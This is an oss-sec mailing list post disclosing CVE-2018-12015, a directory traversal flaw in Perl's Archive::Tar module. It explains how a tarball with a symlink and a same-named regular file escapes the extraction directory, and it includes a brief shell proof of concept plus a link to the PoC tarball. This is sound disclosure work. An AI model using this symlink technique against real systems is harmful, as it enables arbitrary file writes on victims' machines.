oss-sec mailing list archives
Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability
From: Salvatore Bonaccorso <carnil () debian org>
Date: Thu, 7 Jun 2018 20:41:25 +0200
Hi The following dirctory traversal vulnerability was reporte to the Debian bugtracker at https://bugs.debian.org/900834 , which got assigned CVE-2018-12015 by MITRE (requested via the http://cveform.mitre.org/):
By default, the Archive::Tar module doesn't allow extracting files outside the current working directory. However, you can bypass this secure extraction mode easily by putting a symlink and a regular file with the same name into the tarball. I've attached proof of concept tarball, which makes Archive::Tar create /tmp/moo, regardless of what the current working directory is: $ tar -tvvf traversal.tar.gz lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo -rw-r--r-- root/root 4 2018-06-05 18:55 moo $ pwd /home/jwilk $ ls /tmp/moo ls: cannot access '/tmp/moo': No such file or directory $ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")' $ ls /tmp/moo /tmp/moo
The mentioned proof of concept tarball is attached to the Debian bug at https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3 . Regards, Salvatore
Current thread:
- Perl: CVE-2018-12015: Archive::Tar: directory traversal vulnerability Salvatore Bonaccorso (Jun 07)